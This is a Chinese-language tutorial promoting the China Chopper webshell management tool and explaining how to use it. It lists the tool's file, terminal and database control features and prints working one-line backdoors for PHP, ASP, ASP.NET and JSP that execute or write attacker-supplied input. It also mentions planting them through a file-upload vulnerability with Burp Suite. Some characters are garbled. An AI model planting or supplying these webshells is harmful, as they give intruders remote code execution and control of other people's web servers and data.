中國菜刀(附詳細使用教程)

中國菜刀，不是原來切菜做飯的道具，而是一款專業(yè)的webshell管理工具，用途廣泛，使用方便，小巧實用。只要支持動態(tài)腳本的網(wǎng)站，都可以用中國菜刀來進行管理！程序大�。�214K，在非簡體中文環(huán)境下使用時，自動切換到英文界面。

webshell管理工具好用嗎

中國菜刀功能特色

在主視圖中右鍵/添加，在彈出的對話框中輸入服務端地址，連接的密碼(請注意上例中的pass字串)，選擇正確的腳本類型和語言編碼，

保存后即可使用文件管理，虛擬終端，數(shù)據(jù)庫管理，自寫腳本幾大塊功能。

1.文件管理：緩存下載目錄，并支持離線查看緩存目錄，上傳下載修改文件，比ftp要好吧！

2.虛擬終端：人性化的設計，操作方便;(輸入HELP查看更多用法)

3.數(shù)據(jù)庫管理：圖形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS支持ADO方式連接的數(shù)據(jù)庫。

4.網(wǎng)站蜘蛛功能：織出一張網(wǎng)站的目錄結(jié)構(gòu)。下載的列表文件存在桌面，右鍵菜單/載入URL列表即可以根據(jù)地址得到目錄結(jié)構(gòu)。

5.定時提醒：當鬧鐘來使吧, 周期：每月/每周/每日/只一次。

6.快速啟動：一些常用的快捷方式放在這里，可以指定用戶身份運行程序。這部分數(shù)據(jù)是以加密存儲的。

7.瀏覽器：地址欄輸入HELP

8.自定義服務端代碼：通過簡單編碼后提交用戶自己的腳本到服務端執(zhí)行，實現(xiàn)豐富的功能，也可選擇發(fā)送到瀏覽器執(zhí)行。 如果要寫自己的CCC腳本，可以參考一下CCC目錄下的示例代碼, 相信你也可以寫出功能豐富的腳本可以在官網(wǎng)下載別人的CCC腳本，或分享你的得意之作。‍‍

注意：由于服務器的安全設置，某些功能可能不能正常使用。

webshell管理工具怎么用

中國菜刀詳細使用教程

1、打開中國菜刀客戶端

2、在服務端運行的代碼如下：

PHP:    <?php @eval($_POST['pass']);?>

ASP:    <%eval request(“pass”)%>

ASP.NET:    <%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>

JSP：<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>

(注意: ASP.NET要單獨一個文件或此文件也是Jscript語言)

叉叉之前在上傳漏洞演示，利用burpsuite抓包改包上傳最后講到用菜刀連接，看看是怎么實現(xiàn)的：

在主視圖中右鍵/添加，在彈出的對話框中輸入服務端地址，連接的密碼(這個必須要)，選擇正確的腳本類型和語言編碼，保存后即可使用文件管理，虛擬終端，數(shù)據(jù)庫管理三大塊功能。要是其它都沒錯誤，那么可能就是你把語言編碼選錯了.

3、點擊“添加”按鈕，成功后就會產(chǎn)生一條新的記錄，鼠標右鍵點擊就可以進行操作了，如下圖，可以進行文件管理，數(shù)據(jù)庫管理，虛擬終端。哈哈...大功告成！

操作效果截圖：